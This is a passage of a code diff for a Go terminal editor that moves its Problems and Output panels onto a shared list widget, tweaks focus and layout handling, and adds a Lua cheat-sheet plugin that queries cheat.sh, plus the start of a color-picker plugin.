+		EmptyText: "No output",
+		RenderItem: func(surface widgets.Surface, node *widgets.TreeNode, idx, y, w int, selected bool) {
+			o.renderItem(surface, idx, y, w, selected)
+		},
+	})
+	return o
+}
+
+func (o *OutputWidget) Focusable() bool                       { return true }
+func (o *OutputWidget) SetFocused(f bool)                      { o.tree.SetFocused(f) }
+func (o *OutputWidget) IsFocused() bool                        { return o.tree.IsFocused() }
+func (o *OutputWidget) GetRect() Rect                          { return Rect(o.tree.GetRect()) }
+func (o *OutputWidget) SetRect(r Rect)                         { o.tree.SetRect(widgets.Rect(r)) }
+func (o *OutputWidget) Height() int                            { return 0 }
+func (o *OutputWidget) Width() int                             { return 0 }
+func (o *OutputWidget) SetBoxModel(bm widgets.BoxModel)        { o.tree.SetBoxModel(bm) }
+func (o *OutputWidget) Render(surface Surface)                 { o.tree.Render(surface) }
+
+func (o *OutputWidget) HandleEvent(ev tcell.Event) EventResult {
+	prevSel := o.tree.SelectedIndex()
+	result := EventResult(o.tree.HandleEvent(ev))
+	if result != EventIgnored && o.tree.SelectedIndex() != prevSel {
+		if o.tree.SelectedIndex() == o.tree.ItemCount()-1 {
+			o.autoScroll = true
+		} else {
+			o.autoScroll = false
+		}
+	}
+	return result
+}
+
+func (o *OutputWidget) AddLine(line OutputLine) {
+	o.Lines = append(o.Lines, line)
+	nodes := make([]*widgets.TreeNode, len(o.Lines))
+	for i, l := range o.Lines {
+		nodes[i] = &widgets.TreeNode{
+			ID:    fmt.Sprintf("output-%d", i),
+			Label: l.Message,
+		}
+	}
+	o.tree.SetItems(nodes)
+	if o.autoScroll {
+		o.tree.SetSelectedIndex(len(o.Lines) - 1)
+	}
+}
+
+func (o *OutputWidget) Clear() {
+	o.Lines = nil
+	o.tree.SetItems(nil)
+	o.autoScroll = true
+}
+
+func (o *OutputWidget) renderItem(surface widgets.Surface, idx, y, w int, selected bool) {
+	if idx >= len(o.Lines) {
+		return
+	}
+	line := o.Lines[idx]
+
+	style := term.StyleDefault
+	if selected {
+		style = term.StyleSidebarSelected
+	}
+
+	for x := 0; x < w; x++ {
+		surface.SetCell(x, y, term.Cell{Ch: ' ', Style: style})
+	}
+
+	x := 1
+
+	levelStyle := style
+	switch line.Level {
+	case "error":
+		levelStyle = term.StyleDanger
+	case "warn":
+		levelStyle = term.StyleWarning
+	}
+
+	prefix := fmt.Sprintf("%s [%s]", line.Time, line.PluginName)
+	for _, ch := range prefix {
+		if x >= w {
+			break
+		}
+		surface.SetCell(x, y, term.Cell{Ch: ch, Style: term.StyleMuted})
+		x++
+	}
+	x++
+
+	for _, ch := range line.Message {
+		if x >= w {
+			break
+		}
+		surface.SetCell(x, y, term.Cell{Ch: ch, Style: levelStyle})
+		x++
+	}
+}

--- a/internal/ui/problems_widget.go
+++ b/internal/ui/problems_widget.go
@@ -5,6 +5,7 @@ import (
 	"path/filepath"
 
 	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
 	"github.com/gdamore/tcell/v2"
 )
 
@@ -18,28 +19,50 @@ type ProblemItem struct {
 }
 
 type ProblemsWidget struct {
-	BaseWidget
 	Items      []ProblemItem
-	selected   int
-	scrollTop  int
-	scrollbar  Scrollbar
 	OnNavigate func(file string, line, col int)
+	tree       *widgets.TreeWidget
 }
 
 func NewProblemsWidget() *ProblemsWidget {
-	return &ProblemsWidget{}
+	p := &ProblemsWidget{}
+	p.tree = widgets.NewListWidgetFromConfig(widgets.ListConfig{
+		EmptyText: "No problems detected",
+		RenderItem: func(surface widgets.Surface, node *widgets.TreeNode, idx, y, w int, selected bool) {
+			p.renderLine(surface, idx, y, w, selected)
+		},
+		OnCommand: func(command string, node *widgets.TreeNode) {
+			if command == "activate" {
+				p.navigateSelected()
+			}
+		},
+	})
+	return p
 }
 
-func (p *ProblemsWidget) Focusable() bool { return true }
+func (p *ProblemsWidget) Focusable() bool                       { return true }
+func (p *ProblemsWidget) SetFocused(f bool)                      { p.tree.SetFocused(f) }
+func (p *ProblemsWidget) IsFocused() bool                        { return p.tree.IsFocused() }
+func (p *ProblemsWidget) GetRect() Rect                          { return Rect(p.tree.GetRect()) }
+func (p *ProblemsWidget) SetRect(r Rect)                         { p.tree.SetRect(widgets.Rect(r)) }
+func (p *ProblemsWidget) Height() int                            { return 0 }
+func (p *ProblemsWidget) Width() int                             { return 0 }
+func (p *ProblemsWidget) SetBoxModel(bm widgets.BoxModel)        { p.tree.SetBoxModel(bm) }
+func (p *ProblemsWidget) Render(surface Surface)                 { p.tree.Render(surface) }
+func (p *ProblemsWidget) HandleEvent(ev tcell.Event) EventResult {
+	return EventResult(p.tree.HandleEvent(ev))
+}
 
 func (p *ProblemsWidget) SetItems(items []ProblemItem) {
 	p.Items = items
-	if p.selected >= len(items) {
-		p.selected = len(items) - 1
+	nodes := make([]*widgets.TreeNode, len(items))
+	for i, item := range items {
+		nodes[i] = &widgets.TreeNode{
+			ID:    fmt.Sprintf("%s:%d:%d", item.File, item.Line, item.Col),
+			Label: item.Message,
+		}
 	}
-	if p.selected < 0 {
-		p.selected = 0
-	}
+	p.tree.SetItems(nodes)
 }
 
 func (p *ProblemsWidget) HasProblems() bool {
@@ -51,157 +74,66 @@ func (p *ProblemsWidget) HasProblems() bool {
 	return false
 }
 
-func (p *ProblemsWidget) Render(surface Surface) {
-	w, h := surface.Size()
-
-	if len(p.Items) == 0 {
-		msg := "No problems detected"
-		x := 1
-		for _, ch := range msg {
-			if x >= w {
-				break
-			}
-			surface.SetCell(x, 0, term.Cell{Ch: ch, Style: term.StyleMuted})
-			x++
-		}
-		return
-	}
-
-	if p.scrollTop > p.selected {
-		p.scrollTop = p.selected
-	}
-	if p.selected >= p.scrollTop+h {
-		p.scrollTop = p.selected - h + 1
-	}
-
-	r := p.GetRect()
-	p.scrollbar.X = r.X + w - 1
-	p.scrollbar.Y = r.Y
-	p.scrollbar.Height = h
-	p.scrollbar.TotalItems = len(p.Items)
-	p.scrollbar.TopItem = p.scrollTop
-
-	contentW := w
-	if p.scrollbar.Visible() {
-		contentW = w - 1
-	}
-
-	for y := 0; y < h; y++ {
-		idx := p.scrollTop + y
-		if idx >= len(p.Items) {
-			break
-		}
+func (p *ProblemsWidget) navigateSelected() {
+	idx := p.tree.SelectedIndex()
+	if idx >= 0 && idx < len(p.Items) && p.OnNavigate != nil {
 		item := p.Items[idx]
-
-		style := term.StyleDefault
-		if idx == p.selected {
-			style = term.StyleSidebarSelected
-		}
-
-		for x := 0; x < contentW; x++ {
-			surface.SetCell(x, y, term.Cell{Ch: ' ', Style: style})
-		}
-
-		x := 1
-		// Severity icon
-		icon := 'E'
-		iconStyle := term.StyleDanger
-		switch item.Severity {
-		case DiagWarning:
-			icon = 'W'
-			iconStyle = term.StyleWarning
-		case DiagInformation:
-			icon = 'I'
-			iconStyle = term.StyleMuted
-		case DiagHint:
-			icon = 'H'
-			iconStyle = term.StyleMuted
-		}
-		surface.SetCell(x, y, term.Cell{Ch: icon, Style: iconStyle})
-		x += 2
-
-		// File:line
-		loc := fmt.Sprintf("%s:%d", filepath.Base(item.File), item.Line+1)
-		for _, ch := range loc {
-			if x >= contentW {
-				break
-			}
-			surface.SetCell(x, y, term.Cell{Ch: ch, Style: style})
-			x++
-		}
-		x++
-
-		// Message
-		msgStyle := style
-		if idx != p.selected {
-			msgStyle = term.StyleMuted
-		}
-		for _, ch := range item.Message {
-			if x >= contentW {
-				break
-			}
-			surface.SetCell(x, y, term.Cell{Ch: ch, Style: msgStyle})
-			x++
-		}
+		p.OnNavigate(item.File, item.Line, item.Col)
 	}
-
-	p.scrollbar.Render(surface, w-1, 0)
 }
 
-func (p *ProblemsWidget) HandleEvent(ev tcell.Event) EventResult {
-	if newTop, consumed := p.scrollbar.HandleEvent(ev); consumed {
-		p.scrollTop = newTop
-		if p.scrollbar.IsDragging() {
-			return EventCaptured
-		}
-		return EventConsumed
+func (p *ProblemsWidget) renderLine(surface widgets.Surface, idx, y, w int, selected bool) {
+	if idx >= len(p.Items) {
+		return
 	}
-	switch tev := ev.(type) {
-	case *tcell.EventKey:
-		switch tev.Key() {
-		case tcell.KeyUp:
-			if p.selected > 0 {
-				p.selected--
-			}
-			return EventConsumed
-		case tcell.KeyDown:
-			if p.selected < len(p.Items)-1 {
-				p.selected++
-			}
-			return EventConsumed
-		case tcell.KeyEnter:
-			if p.selected < len(p.Items) && p.OnNavigate != nil {
-				item := p.Items[p.selected]
-				p.OnNavigate(item.File, item.Line, item.Col)
-			}
-			return EventConsumed
-		}
-	case *tcell.EventMouse:
-		btn := tev.Buttons()
-		_, my := tev.Position()
-		r := p.GetRect()
-		row := my - r.Y
-		idx := p.scrollTop + row
-		if btn&tcell.Button1 != 0 && idx >= 0 && idx < len(p.Items) {
-			p.selected = idx
-			if p.OnNavigate != nil {
-				item := p.Items[p.selected]
-				p.OnNavigate(item.File, item.Line, item.Col)
-			}
-			return EventConsumed
-		}
-		if btn&tcell.WheelUp != 0 {
-			if p.scrollTop > 0 {
-				p.scrollTop--
-			}
-			return EventConsumed
-		}
-		if btn&tcell.WheelDown != 0 {
-			if p.scrollTop < len(p.Items)-1 {
-				p.scrollTop++
-			}
-			return EventConsumed
-		}
+	item := p.Items[idx]
+
+	style := term.StyleDefault
+	if selected {
+		style = term.StyleSidebarSelected
 	}
-	return EventIgnored
+
+	for x := 0; x < w; x++ {
+		surface.SetCell(x, y, term.Cell{Ch: ' ', Style: style})
+	}
+
+	x := 1
+
+	icon := 'E'
+	iconStyle := term.StyleDanger
+	switch item.Severity {
+	case DiagWarning:
+		icon = 'W'
+		iconStyle = term.StyleWarning
+	case DiagInformation:
+		icon = 'I'
+		iconStyle = term.StyleMuted
+	case DiagHint:
+		icon = 'H'
+		iconStyle = term.StyleMuted
+	}
+	surface.SetCell(x, y, term.Cell{Ch: icon, Style: iconStyle})
+	x += 2
+
+	loc := fmt.Sprintf("%s:%d", filepath.Base(item.File), item.Line+1)
+	for _, ch := range loc {
+		if x >= w {
+			break
+		}
+		surface.SetCell(x, y, term.Cell{Ch: ch, Style: style})
+		x++
+	}
+	x++
+
+	msgStyle := style
+	if !selected {
+		msgStyle = term.StyleMuted
+	}
+	for _, ch := range item.Message {
+		if x >= w {
+			break
+		}
+		surface.SetCell(x, y, term.Cell{Ch: ch, Style: msgStyle})
+		x++
+	}
 }

--- a/internal/ui/tabbed_panel.go
+++ b/internal/ui/tabbed_panel.go
@@ -88,6 +88,15 @@ func (tp *TabbedPanel) PanelCount() int {
 	return len(tp.panels)
 }
 
+func (tp *TabbedPanel) HasPanel(id string) bool {
+	for _, p := range tp.panels {
+		if p.ID == id {
+			return true
+		}
+	}
+	return false
+}
+
 func (tp *TabbedPanel) PanelIDs() []string {
 	ids := make([]string, len(tp.panels))
 	for i, p := range tp.panels {

--- a/internal/widgets/focus.go
+++ b/internal/widgets/focus.go
@@ -134,11 +134,11 @@ func (fm *FocusManager) HandleEvent(ev tcell.Event) EventResult {
 	}
 	switch tev := ev.(type) {
 	case *tcell.EventKey:
-		if tev.Key() == tcell.KeyTab {
+		if tev.Key() == tcell.KeyTab && len(fm.items) > 1 {
 			fm.FocusNext()
 			return EventConsumed
 		}
-		if tev.Key() == tcell.KeyBacktab {
+		if tev.Key() == tcell.KeyBacktab && len(fm.items) > 1 {
 			fm.FocusPrev()
 			return EventConsumed
 		}

--- a/internal/widgets/focus.go
+++ b/internal/widgets/focus.go
@@ -14,6 +14,10 @@ func NewFocusManager() *FocusManager {
 }
 
 func (fm *FocusManager) Collect(w Widget) {
+	var prev FocusableWidget
+	if fm.focused >= 0 && fm.focused < len(fm.items) {
+		prev = fm.items[fm.focused]
+	}
 	for _, item := range fm.items {
 		item.SetFocused(false)
 	}
@@ -22,7 +26,15 @@ func (fm *FocusManager) Collect(w Widget) {
 	collectFocusable(w, &fm.items)
 	if len(fm.items) > 0 {
 		fm.focused = 0
-		fm.items[0].SetFocused(true)
+		if prev != nil {
+			for i, item := range fm.items {
+				if item == prev {
+					fm.focused = i
+					break
+				}
+			}
+		}
+		fm.items[fm.focused].SetFocused(true)
 	}
 }
 
@@ -117,6 +129,9 @@ func (fm *FocusManager) Focused() Widget {
 }
 
 func (fm *FocusManager) HandleEvent(ev tcell.Event) EventResult {
+	if len(fm.items) == 0 {
+		return EventIgnored
+	}
 	switch tev := ev.(type) {
 	case *tcell.EventKey:
 		if tev.Key() == tcell.KeyTab {
@@ -133,6 +148,13 @@ func (fm *FocusManager) HandleEvent(ev tcell.Event) EventResult {
 	case *tcell.EventMouse:
 		if tev.Buttons()&tcell.Button1 != 0 {
 			fm.FocusByClick(tev.Position())
+		}
+		mx, my := tev.Position()
+		for _, fw := range fm.items {
+			r := fw.GetRect()
+			if mx >= r.X && mx < r.X+r.W && my >= r.Y && my < r.Y+r.H {
+				return fw.HandleEvent(ev)
+			}
 		}
 		if fw := fm.Focused(); fw != nil {
 			return fw.HandleEvent(ev)

--- a/internal/widgets/hstack.go
+++ b/internal/widgets/hstack.go
@@ -6,16 +6,22 @@ import (
 
 type HStackWidget struct {
 	BaseWidget
-	Children []Widget
-	Align    string `json:"align,omitempty"`
-	Gap      int    `json:"gap,omitempty"`
+	Children    []Widget
+	Align       string `json:"align,omitempty"`
+	Gap         int    `json:"gap,omitempty"`
+	FixedHeight int
 }
 
 func NewHStackWidget(children ...Widget) *HStackWidget {
 	return &HStackWidget{Children: children}
 }
 
-func (s *HStackWidget) Height() int { return 0 }
+func (s *HStackWidget) Height() int {
+	if s.FixedHeight > 0 {
+		return s.FixedHeight
+	}
+	return 0
+}
 func (s *HStackWidget) Width() int  { return 0 }
 
 func (s *HStackWidget) Render(surface Surface) {

--- a/internal/widgets/input_test.go
+++ b/internal/widgets/input_test.go
@@ -524,6 +524,7 @@ func TestTreeBadgeStyle(t *testing.T) {
 
 	// Select node "b" so "a" is unselected and shows its BadgeStyle
 	tree.SelectByID("b")
+	tree.SetFocused(true)
 	s := renderWidget(tree, 0, 0, 20, 10)
 
 	// Row 0 ("A"): badge "M" should render in StyleWarning

--- a/internal/widgets/label.go
+++ b/internal/widgets/label.go
@@ -13,7 +13,8 @@ type LabelConfig struct {
 
 type LabelWidget struct {
 	BaseWidget
-	Config LabelConfig
+	Config     LabelConfig
+	FixedWidth int
 }
 
 func NewLabelWidget(config LabelConfig) *LabelWidget {
@@ -21,7 +22,12 @@ func NewLabelWidget(config LabelConfig) *LabelWidget {
 }
 
 func (l *LabelWidget) Height() int { return 1 + l.BoxOverheadH() }
-func (l *LabelWidget) Width() int  { return 0 }
+func (l *LabelWidget) Width() int {
+	if l.FixedWidth > 0 {
+		return l.FixedWidth
+	}
+	return 0
+}
 
 func (l *LabelWidget) Render(surface Surface) {
 	inner := l.RenderBox(surface)

--- a/internal/widgets/label.go
+++ b/internal/widgets/label.go
@@ -7,6 +7,7 @@ import (
 
 type LabelConfig struct {
 	Text  string     `json:"text"`
+	Badge string     `json:"badge,omitempty"`
 	Style term.Style `json:"-"`
 }
 
@@ -32,7 +33,16 @@ func (l *LabelWidget) Render(surface Surface) {
 	if style == 0 {
 		style = term.StyleDefault
 	}
-	inner.DrawText(0, 0, l.Config.Text, w, style)
+	maxTextW := w
+	if l.Config.Badge != "" {
+		badgeRunes := []rune(l.Config.Badge)
+		bx := w - len(badgeRunes)
+		if bx > 0 {
+			maxTextW = bx - 1
+			inner.DrawText(bx, 0, l.Config.Badge, w, term.StyleMuted)
+		}
+	}
+	inner.DrawText(0, 0, l.Config.Text, maxTextW, style)
 }
 
 func (l *LabelWidget) HandleEvent(ev tcell.Event) EventResult {

--- a/internal/widgets/list_widget.go
+++ b/internal/widgets/list_widget.go
@@ -1,0 +1,40 @@
+package widgets
+
+type ListItem struct {
+	ID      string   `json:"id"`
+	Label   string   `json:"label"`
+	Icon    string   `json:"icon,omitempty"`
+	Badge   string   `json:"badge,omitempty"`
+	Actions []Action `json:"actions,omitempty"`
+}
+
+type ListConfig struct {
+	EmptyText  string
+	OnSelect   func(node *TreeNode)
+	OnCommand  func(command string, node *TreeNode)
+	RenderItem func(surface Surface, node *TreeNode, idx, y, w int, selected bool)
+}
+
+func NewListWidget(items []ListItem) *TreeWidget {
+	nodes := make([]*TreeNode, len(items))
+	for i, li := range items {
+		nodes[i] = &TreeNode{
+			ID:      li.ID,
+			Label:   li.Label,
+			Icon:    li.Icon,
+			Badge:   li.Badge,
+			Actions: li.Actions,
+		}
+	}
+	return NewTreeWidget(TreeConfig{Items: nodes})
+}
+
+func NewListWidgetFromConfig(cfg ListConfig) *TreeWidget {
+	return NewTreeWidget(TreeConfig{
+		EmptyText:  cfg.EmptyText,
+		Indent:     -1,
+		OnSelect:   cfg.OnSelect,
+		OnCommand:  cfg.OnCommand,
+		RenderItem: cfg.RenderItem,
+	})
+}

--- a/internal/widgets/scrollview.go
+++ b/internal/widgets/scrollview.go
@@ -12,6 +12,7 @@ type ScrollViewWidget struct {
 	scrollX int
 	scrollY int
 	vbar    scrollbar
+	focused bool
 }
 
 func NewScrollViewWidget(child ScrollableWidget) *ScrollViewWidget {
@@ -150,6 +151,10 @@ func (sv *ScrollViewWidget) HandleEvent(ev tcell.Event) EventResult {
 	}
 	return EventIgnored
 }
+
+func (sv *ScrollViewWidget) Focusable() bool           { return true }
+func (sv *ScrollViewWidget) SetFocused(focused bool)    { sv.focused = focused }
+func (sv *ScrollViewWidget) IsFocused() bool            { return sv.focused }
 
 func (sv *ScrollViewWidget) clamp(contentW, contentH, viewW, viewH int) {
 	maxY := contentH - viewH

--- a/internal/widgets/tree.go
+++ b/internal/widgets/tree.go
@@ -280,7 +280,7 @@ func (t *TreeWidget) renderNode(surface Surface, node *TreeNode, idx, y, w int) 
 	}
 
 	style := term.StyleDefault
-	if idx == t.selected {
+	if idx == t.selected && t.focused {
 		style = term.StyleSidebarSelected
 	} else if t.Config.ActiveID != "" && node.ID == t.Config.ActiveID {
 		style = term.StyleSidebarSelected

--- a/internal/widgets/tree.go
+++ b/internal/widgets/tree.go
@@ -223,13 +223,17 @@ func (t *TreeWidget) Render(surface Surface) {
 	t.scrollbar.TotalItems = len(t.flatList)
 	t.scrollbar.TopItem = t.scrollTop
 
+	contentW := w
+	if t.scrollbar.visible() {
+		contentW = w - 1
+	}
 	for i := range h {
 		idx := t.scrollTop + i
 		if idx >= len(t.flatList) {
 			break
 		}
 		node := t.flatList[idx]
-		t.renderNode(surface, node, idx, i, w)
+		t.renderNode(surface, node, idx, i, contentW)
 	}
 
 	t.scrollbar.Render(surface, w-1, 0)

--- a/internal/widgets/tree.go
+++ b/internal/widgets/tree.go
@@ -21,14 +21,6 @@ type TreeNode struct {
 	depth    int
 }
 
-type ListItem struct {
-	ID      string   `json:"id"`
-	Label   string   `json:"label"`
-	Icon    string   `json:"icon,omitempty"`
-	Badge   string   `json:"badge,omitempty"`
-	Actions []Action `json:"actions,omitempty"`
-}
-
 type Action struct {
 	Icon    string `json:"icon"`
 	Command string `json:"command"`
@@ -49,11 +41,12 @@ type TreeConfig struct {
 	ActiveID       string      `json:"-"`
 	EmptyText      string      `json:"emptyText,omitempty"`
 
-	OnCommand func(command string, node *TreeNode)
-	OnMenu    func(entries []MenuEntry, node *TreeNode, screenX, screenY int)
-	OnExpand  func(node *TreeNode)
-	OnSelect  func(node *TreeNode)
-	OnKey     func(ev *tcell.EventKey, node *TreeNode) bool
+	OnCommand  func(command string, node *TreeNode)
+	OnMenu     func(entries []MenuEntry, node *TreeNode, screenX, screenY int)
+	OnExpand   func(node *TreeNode)
+	OnSelect   func(node *TreeNode)
+	OnKey      func(ev *tcell.EventKey, node *TreeNode) bool
+	RenderItem func(surface Surface, node *TreeNode, idx, y, w int, selected bool)
 }
 
 type TreeWidget struct {
@@ -67,20 +60,6 @@ type TreeWidget struct {
 	focused   bool
 
 	scrollbar scrollbar
-}
-
-func NewListWidget(items []ListItem) *TreeWidget {
-	nodes := make([]*TreeNode, len(items))
-	for i, li := range items {
-		nodes[i] = &TreeNode{
-			ID:      li.ID,
-			Label:   li.Label,
-			Icon:    li.Icon,
-			Badge:   li.Badge,
-			Actions: li.Actions,
-		}
-	}
-	return NewTreeWidget(TreeConfig{Items: nodes})
 }
 
 func NewTreeWidget(cfg TreeConfig) *TreeWidget {
@@ -290,6 +269,11 @@ func (t *TreeWidget) rightSideWidth(node *TreeNode) int {
 }
 
 func (t *TreeWidget) renderNode(surface Surface, node *TreeNode, idx, y, w int) {
+	if t.Config.RenderItem != nil {
+		t.Config.RenderItem(surface, node, idx, y, w, idx == t.selected)
+		return
+	}
+
 	style := term.StyleDefault
 	if idx == t.selected {
 		style = term.StyleSidebarSelected

--- a/internal/widgets/tree.go
+++ b/internal/widgets/tree.go
@@ -60,6 +60,7 @@ type TreeWidget struct {
 	focused   bool
 
 	scrollbar scrollbar
+	contentW  int
 }
 
 func NewTreeWidget(cfg TreeConfig) *TreeWidget {
@@ -223,9 +224,9 @@ func (t *TreeWidget) Render(surface Surface) {
 	t.scrollbar.TotalItems = len(t.flatList)
 	t.scrollbar.TopItem = t.scrollTop
 
-	contentW := w
+	t.contentW = w
 	if t.scrollbar.visible() {
-		contentW = w - 1
+		t.contentW = w - 1
 	}
 	for i := range h {
 		idx := t.scrollTop + i
@@ -233,7 +234,7 @@ func (t *TreeWidget) Render(surface Surface) {
 			break
 		}
 		node := t.flatList[idx]
-		t.renderNode(surface, node, idx, i, contentW)
+		t.renderNode(surface, node, idx, i, t.contentW)
 	}
 
 	t.scrollbar.Render(surface, w-1, 0)
@@ -481,14 +482,14 @@ func (t *TreeWidget) handleMouse(ev *tcell.EventMouse) EventResult {
 		t.selected = idx
 
 		menuW := t.menuIconWidth()
-		if menuW > 0 && mx >= t.rect.X+t.rect.W-menuW {
+		if menuW > 0 && mx >= t.rect.X+t.contentW-menuW {
 			if t.Config.OnMenu != nil {
 				t.Config.OnMenu(t.Config.NodeMenu, node, mx, my)
 			}
 			return EventConsumed
 		}
 
-		rightX := t.rect.X + t.rect.W - 2 - t.menuIconWidth()
+		rightX := t.rect.X + t.contentW - 2 - t.menuIconWidth()
 		for i := len(node.Actions) - 1; i >= 0; i-- {
 			action := node.Actions[i]
 			iconW := len([]rune(action.Icon))

--- a/internal/widgets/vstack.go
+++ b/internal/widgets/vstack.go
@@ -51,6 +51,15 @@ func (v *VStackWidget) HeightForWidth(w int) int {
 	return total + v.BoxOverheadH()
 }
 
+func (v *VStackWidget) ScrollSize() (int, int) {
+	r := v.GetRect()
+	w := r.W
+	if w <= 0 {
+		w = 80
+	}
+	return w, v.HeightForWidth(w)
+}
+
 func (v *VStackWidget) Render(surface Surface) {
 	inner := v.RenderBox(surface)
 	w, h := inner.Size()

--- a/plugins/cheat-sheet/plugin.lua
+++ b/plugins/cheat-sheet/plugin.lua
@@ -1,0 +1,194 @@
+local ttt = require("ttt")
+local net = require("ttt.net")
+
+-- State
+local history = {}       -- array of query strings (most recent first, max 10)
+local cache = {}          -- query -> response body
+local current_query = nil -- currently displayed query
+local current_body = nil  -- currently displayed body (or nil while loading)
+local current_error = nil -- error message if fetch failed
+local fetching = false    -- true while a request is in flight
+local last_panel = nil    -- sidebar panel reference for redraw
+
+-- Add a query to history (move to front if already present, cap at 10)
+local function add_to_history(query)
+  -- Remove if already in history
+  for i = #history, 1, -1 do
+    if history[i] == query then
+      table.remove(history, i)
+    end
+  end
+  -- Insert at front
+  table.insert(history, 1, query)
+  -- Cap at 10
+  while #history > 10 do
+    table.remove(history)
+  end
+end
+
+-- Fetch a cheat sheet and display it in an editor tab
+local function fetch_and_display(query)
+  if not query or query == "" then
+    return
+  end
+
+  current_query = query
+  current_error = nil
+  fetching = true
+
+  add_to_history(query)
+
+  -- Check cache first
+  if cache[query] then
+    current_body = cache[query]
+    fetching = false
+    ttt.open_tab({
+      title = "cheat: " .. query,
+      render = function(p)
+        for line in current_body:gmatch("[^\n]*") do
+          p:label(line)
+        end
+      end,
+    })
+    if last_panel then last_panel:redraw() end
+    return
+  end
+
+  -- Show loading tab
+  ttt.open_tab({
+    title = "cheat: " .. query,
+    render = function(p)
+      p:label({ text = "Loading cheat sheet for: " .. query .. "...", style = "muted" })
+    end,
+  })
+  if last_panel then last_panel:redraw() end
+
+  -- Fetch from cheat.sh
+  local url = "http://cheat.sh/" .. query .. "?T"
+  ttt.log("Fetching cheat sheet: " .. url)
+
+  net.get_async(url, function(resp)
+    fetching = false
+
+    if resp.error then
+      current_error = "Network error: " .. resp.error
+      current_body = nil
+      ttt.log("error", current_error)
+      ttt.open_tab({
+        title = "cheat: " .. query,
+        render = function(p)
+          p:label({ text = "Error fetching cheat sheet", style = "danger" })
+          p:label({ text = current_error, style = "danger" })
+          p:label("")
+          p:label({ text = "Query: " .. query, style = "muted" })
+        end,
+      })
+    elseif resp.status ~= 200 then
+      current_error = "HTTP " .. tostring(resp.status)
+      current_body = nil
+      ttt.log("error", "Cheat sheet fetch failed: " .. current_error)
+      ttt.open_tab({
+        title = "cheat: " .. query,
+        render = function(p)
+          p:label({ text = "Error fetching cheat sheet", style = "danger" })
+          p:label({ text = "HTTP status: " .. tostring(resp.status), style = "danger" })
+          if resp.status == 404 then
+            p:label({ text = "Topic not found: " .. query, style = "warning" })
+          end
+          p:label("")
+          p:label({ text = "Try a different query, e.g.: go/slice, python/list, bash/find", style = "muted" })
+        end,
+      })
+    else
+      current_body = resp.body
+      current_error = nil
+      cache[query] = resp.body
+      ttt.log("Cheat sheet loaded: " .. query)
+
+      -- Capture body for the render closure
+      local body = resp.body
+      ttt.open_tab({
+        title = "cheat: " .. query,
+        render = function(p)
+          for line in body:gmatch("[^\n]*") do
+            p:label(line)
+          end
+        end,
+      })
+    end
+
+    if last_panel then last_panel:redraw() end
+  end)
+end
+
+-- Build history list items for the sidebar
+local function history_items()
+  local items = {}
+  for i, query in ipairs(history) do
+    local has_cache = cache[query] ~= nil
+    table.insert(items, {
+      id = "history_" .. tostring(i),
+      label = query,
+      badge = has_cache and "cached" or "",
+    })
+  end
+  return items
+end
+
+-- Command handler: prompt for topic via input in sidebar
+local function cmd_search()
+  -- Focus the sidebar panel so the user sees the input
+  if last_panel then last_panel:redraw() end
+end
+
+-- Registration
+ttt.register({
+  sidebar = {
+    title = "Cheat Sheet",
+    render = function(panel)
+      last_panel = panel
+
+      -- Search input
+      panel:input({
+        placeholder = "e.g. go/slice, python/list, bash/find",
+        prefix = "$ ",
+        on_submit = function(text)
+          fetch_and_display(text)
+        end,
+      })
+
+      -- Status
+      if fetching then
+        panel:label({ text = "Fetching...", style = "muted", margin_top = 1 })
+      end
+
+      -- History section
+      if #history > 0 then
+        panel:label({ text = "Recent Lookups", style = "muted", margin_top = 1, padding_left = 1 })
+        panel:list({
+          items = history_items(),
+          on_select = function(node)
+            -- Extract the query from the label
+            fetch_and_display(node.label)
+          end,
+        })
+      else
+        panel:label({ text = "No recent lookups", style = "muted", margin_top = 1 })
+        panel:label({ text = "Type a query above and press Enter", style = "muted" })
+        panel:label({ text = "Examples:", style = "muted", margin_top = 1 })
+        panel:label({ text = "  go/slice", style = "muted" })
+        panel:label({ text = "  python/list", style = "muted" })
+        panel:label({ text = "  bash/find", style = "muted" })
+        panel:label({ text = "  js/array/map", style = "muted" })
+      end
+    end,
+  },
+
+  commands = {
+    { id = "cheatsheet.search", title = "Cheat Sheet: Search", handler = cmd_search },
+  },
+
+  keybindings = {
+    { key = "ctrl+k h", command = "cheatsheet.search" },
+  },
+})

--- a/plugins/cheat-sheet/plugin.ttt.json
+++ b/plugins/cheat-sheet/plugin.ttt.json
@@ -1,0 +1,14 @@
+{
+  "name": "cheat-sheet",
+  "description": "Fetch programming cheat sheets from cheat.sh and display them in an editor tab",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.sidebar": true,
+    "panel.editor": true,
+    "commands": true,
+    "keybindings": true,
+    "network.http": true
+  }
+}

--- a/plugins/color-picker/plugin.lua
+++ b/plugins/color-picker/plugin.lua
@@ -1,0 +1,175 @@
+local ttt = require("ttt")
+local editor = require("ttt.editor")
+
+-- Color palettes organized by category
+local palettes = {
+  {
+    name = "Basic",
+    colors = {
+      { name = "Black",   hex = "#000000" },
+      { name = "White",   hex = "#ffffff" },
+      { name = "Red",     hex = "#ff0000" },
+      { name = "Green",   hex = "#00ff00" },
+      { name = "Blue",    hex = "#0000ff" },
+      { name = "Yellow",  hex = "#ffff00" },
+      { name = "Cyan",    hex = "#00ffff" },
+      { name = "Magenta", hex = "#ff00ff" },
+    },
+  },
+  {
+    name = "Grays",
+    colors = {
+      { name = "White Smoke",  hex = "#f5f5f5" },
+      { name = "Gainsboro",    hex = "#dcdcdc" },
+      { name = "Silver",       hex = "#c0c0c0" },
+      { name = "Dark Gray",    hex = "#a9a9a9" },
+      { name = "Gray",         hex = "#808080" },
+      { name = "Dim Gray",     hex = "#696969" },
+      { name = "Charcoal",     hex = "#36454f" },
+      { name = "Jet",          hex = "#343434" },
+    },
+  },
+  {
+    name = "Reds & Oranges",
+    colors = {
+      { name = "Light Coral",  hex = "#f08080" },
+      { name = "Salmon",       hex = "#fa8072" },
+      { name = "Coral",        hex = "#ff7f50" },
+      { name = "Tomato",       hex = "#ff6347" },
+      { name = "Orange Red",   hex = "#ff4500" },
+      { name = "Crimson",      hex = "#dc143c" },
+      { name = "Fire Brick",   hex = "#b22222" },
+      { name = "Dark Red",     hex = "#8b0000" },
+      { name = "Orange",       hex = "#ffa500" },
+      { name = "Dark Orange",  hex = "#ff8c00" },
+    },
+  },
+  {
+    name = "Yellows & Browns",
+    colors = {
+      { name = "Gold",         hex = "#ffd700" },
+      { name = "Khaki",        hex = "#f0e68c" },
